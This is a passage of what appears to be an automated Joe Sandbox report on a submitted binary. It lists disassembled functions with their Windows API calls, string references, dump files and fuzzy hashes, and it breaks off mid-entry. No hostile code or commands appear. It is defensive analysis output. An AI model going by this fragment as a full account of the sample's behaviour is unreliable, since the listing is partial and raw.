QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B05510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B05522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B0555E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 680b2d6262dd4e40af06d4e00127901b8ab4720f147a6d18dd64246077766588
Instruction ID: ee5023ae9c268ab84f22a4abc41a49b2bae3556e4f96f090f82e2d25be147596
Opcode Fuzzy Hash: 680b2d6262dd4e40af06d4e00127901b8ab4720f147a6d18dd64246077766588
Instruction Fuzzy Hash: DF013C35C00A19DBCF209BE4EC896EEBBB8FB19701F4000A6E501B3580DB3056618BA1

Function 00AF7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?,?,00AF799D), ref: 00AF766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?), ref: 00AF768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?), ref: 00AF7698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?), ref: 00AF76A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?), ref: 00AF76B4

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 65734095ca9d07954669cacbdc52cc124f939cfd49643a9a7a28b70e0401dd68
Instruction ID: 48c194360d7a567ac110af241216a54b949b4e8b0f99fe491b72f0a7d9c05560
Opcode Fuzzy Hash: 65734095ca9d07954669cacbdc52cc124f939cfd49643a9a7a28b70e0401dd68
Instruction Fuzzy Hash: 72017172601609ABDB219F9CDC44ABEBBBDEB45751F140038FE04D7211EB31DD4197A0

Function 00AF85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AF8608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AF8612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AF8621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AF8628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AF863E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f9a3932ee3b742868a0c5f48290fcee713b6f50792b86aef89c9daf342aa116c
Instruction ID: 9211b59b20b67076deb1dc951c7291dcadcaef0a1bcc2a46344bfe821087abcf
Opcode Fuzzy Hash: f9a3932ee3b742868a0c5f48290fcee713b6f50792b86aef89c9daf342aa116c
Instruction Fuzzy Hash: 3EF03731201209AFEB200FE5DC89E7B3BACEF8AB55B400439FA49D7150DF659C42DA60

Function 00AF8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AF8669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF869F

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c99658d3953481b29fd86d84f527a0d77d64a935181c842e6f3f25708c491e39
Instruction ID: 381441699b03a0974efc73c85e9c98c0b426beadeb2324d723db46977c7d5119
Opcode Fuzzy Hash: c99658d3953481b29fd86d84f527a0d77d64a935181c842e6f3f25708c491e39
Instruction Fuzzy Hash: C8F04971200209AFEB211FA5EC88E7B3BBCEF89B55B100039FA49D7150CF759942EA60

Function 00AFC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00AFC6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 00AFC6D1
MessageBeep.USER32(00000000), ref: 00AFC6E9
KillTimer.USER32(?,0000040A), ref: 00AFC705
EndDialog.USER32(?,00000001), ref: 00AFC71F

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 868d33d6da3ddc771c43d56ecc68f6d212f0da15185517b94575e1f134ce48d9
Instruction ID: 9436174cffa31b7a9193193f0ac23d98bcc2ec8abd3583128526c1c3cf0ecb94
Opcode Fuzzy Hash: 868d33d6da3ddc771c43d56ecc68f6d212f0da15185517b94575e1f134ce48d9
Instruction Fuzzy Hash: F9014F3050470DABEB316B61DE4EFB677B8FB04715F000669B642A24E1EBE4A959CE80

Function 00AA13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00AA13BF
StrokeAndFillPath.GDI32(?,?,00ADBAD8,00000000,?), ref: 00AA13DB
SelectObject.GDI32(?,00000000), ref: 00AA13EE
DeleteObject.GDI32 ref: 00AA1401
StrokePath.GDI32(?), ref: 00AA141C

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: b0649c6eda0bc623cd534db51b0ebccfcb87cf965a20ad2dd504d361e5f7c3db
Instruction ID: 92e0a6c5c9972784571f0d742c5a989c7229478e201495089966f16a61d0b4a3
Opcode Fuzzy Hash: b0649c6eda0bc623cd534db51b0ebccfcb87cf965a20ad2dd504d361e5f7c3db
Instruction Fuzzy Hash: 01F0EC70004309EBDB255F2AED0CB693FB5A752326F04C236E4298B0F1CB794996DF60

Function 00B0C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B0C69D
CoCreateInstance.OLE32(00B32D6C,00000000,00000001,00B32BDC,?), ref: 00B0C6B5

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

CoUninitialize.OLE32 ref: 00B0C922

Strings

.lnk, xrefs: 00B0C631, 00B0C659, 00B0C663

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: cd0b44102b19da230387d3907b894efd1cc18ca37a7b70ca1fb0ef0ebd7798f9
Instruction ID: 50f072ecc52a2296fac862d3aa88749ace4250f458bec19d616a4d861b3e7c98
Opcode Fuzzy Hash: cd0b44102b19da230387d3907b894efd1cc18ca37a7b70ca1fb0ef0ebd7798f9
Instruction Fuzzy Hash: 40A12C71204205AFD700EF64C981EAFB7E8EF85744F00496DF1569B1E1EB71EA49CB62

Function 00AB2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00AC0FF6: std::exception::exception.LIBCMT ref: 00AC102C
Part of subcall function 00AC0FF6: __CxxThrowException@8.LIBCMT ref: 00AC1041

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

Part of subcall function 00AA7BB1: _memmove.LIBCMT ref: 00AA7C0B

__swprintf.LIBCMT ref: 00AB302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AB2EC6

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: adc39d941f2e748372883b279cf1a5ec675a7f1077889072e9f80d40994ae8d4
Instruction ID: 590b7f3b7cad386c272deadeaaf744f0e2b848a38f76284a28758e217d86df39
Opcode Fuzzy Hash: adc39d941f2e748372883b279cf1a5ec675a7f1077889072e9f80d40994ae8d4
Instruction Fuzzy Hash: 129181725083419FCB14EF24D985DAFB7B8EF95750F00495DF4429B2A2DB20EE44CB52

Function 00B0BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA48A1,?,?,00AA37C0,?), ref: 00AA48CE

CoInitialize.OLE32(00000000), ref: 00B0BC26
CoCreateInstance.OLE32(00B32D6C,00000000,00000001,00B32BDC,?), ref: 00B0BC3F
CoUninitialize.OLE32 ref: 00B0BC5C

Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C

Strings

.lnk, xrefs: 00B0BC08, 00B0BC16

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: c3acb9249c062637fb9c4cc8c1b831fe89115d5cdf440e22012ab43257626db6
Instruction ID: e6fefa8e03aa418aa95a0b4e706152b9a5640d32cdedb3df23fe7542ea2d9e52
Opcode Fuzzy Hash: c3acb9249c062637fb9c4cc8c1b831fe89115d5cdf440e22012ab43257626db6
Instruction Fuzzy Hash: 27A12575604301AFCB14DF14C984E6ABBE5FF89314F148998F89A9B3A1CB32ED45CB91

Function 00AC524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00AC52DD

Part of subcall function 00AD0340: __87except.LIBCMT ref: 00AD037B

Strings

pow, xrefs: 00AC52B5, 00AC52D2

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: e3ec7591d30467265d743f06943adbbb68ad6e8d3904af16aa2917f61b85ac91
Instruction ID: bdc0af25ad0ac79b99119a747a670529075f891cea7fc3923aad2e25ce2e568d
Opcode Fuzzy Hash: e3ec7591d30467265d743f06943adbbb68ad6e8d3904af16aa2917f61b85ac91
Instruction Fuzzy Hash: 935168B1E1DA0186C7116734CA11FAE3BE0DB00750F65895EF4D68A3E6EF74ACC49A46

Function 00AC023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00AC0280
+, xrefs: 00AC0277

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: dd916aa15245503e9b5f9e64455425c1824d779b6afff442feb390f0d80c2289
Instruction ID: e9c435ee3a7928ae39b11158823926cae3d2531dc28cbe66cf6eecaee04773cd
Opcode Fuzzy Hash: dd916aa15245503e9b5f9e64455425c1824d779b6afff442feb390f0d80c2289
Instruction Fuzzy Hash: 8B51127590664ADFCF25DFB8C888AFA7BB4EF16310F184059FA919B2A0D7349D42C760

Function 00AB62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AB63A8
_memmove.LIBCMT ref: 00AB6446
_memset.LIBCMT ref: 00AB646A

Strings

ERCP, xrefs: 00AB6313

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: a742978ec75d099bd49eacee7ff64195583e45f9ff43edb53c48f25596ae5a05
Instruction ID: 376e5829796afda4b8e8da70b8d59bb72e97a452d371aebc1534015648558b1f
Opcode Fuzzy Hash: a742978ec75d099bd49eacee7ff64195583e45f9ff43edb53c48f25596ae5a05
Instruction Fuzzy Hash: F1517171900709DFDB24CF65C981BEABBF8EF04714F20856EEA4ACB242E7759594CB44

Function 00B27BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B2F910,00000000,?,?,?,?), ref: 00B27C4E
GetWindowLongW.USER32 ref: 00B27C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B27C7B

Strings

SysTreeView32, xrefs: 00B27C20

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 30798c99969b17622f1df98567aaae1a3c363d83b8a4fad05d9b942fba804ec6
Instruction ID: 62903103d6d37c8940e6e70391924d4d138579d5291f642ad5a7f366e02f104b
Opcode Fuzzy Hash: 30798c99969b17622f1df98567aaae1a3c363d83b8a4fad05d9b942fba804ec6
Instruction Fuzzy Hash: B431C131244216ABDB258F38EC45BEA77E9EF15324F204765F879A32E0CB31EC519B54

Function 00B27648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B276D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B276E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B27708

Strings

SysMonthCal32, xrefs: 00B2769B

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 74266240615bccaf87c670e01df6ce331ee3e09836da1386e34f4d1ae2633e19
Instruction ID: 8be563711eda331028273b4be0d62749908e5c77e4bcd64dc92b7c176b04c841
Opcode Fuzzy Hash: 74266240615bccaf87c670e01df6ce331ee3e09836da1386e34f4d1ae2633e19
Instruction Fuzzy Hash: 2521D332540229BBDF22CF54DC46FEA3BB9EF48714F110254FE196B1D0DAB1AC518BA0

Function 00B26F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B26FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B26FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B26FDF

Strings

Listbox, xrefs: 00B26F77

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 105f617e5f1873430f4f6c7532485a3630cc6890fd395abdefa6b9927c3e6428
Instruction ID: 0fc04cf3707dffe96d1e4eca107e6a573efff1824d5f6ea2487dcfd09e616868
Opcode Fuzzy Hash: 105f617e5f1873430f4f6c7532485a3630cc6890fd395abdefa6b9927c3e6428
Instruction Fuzzy Hash: FF2165326111287FDF158F54EC85FBB37AAEF89754F118164F9189B190CA719C51CBA0

Function 00B2797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

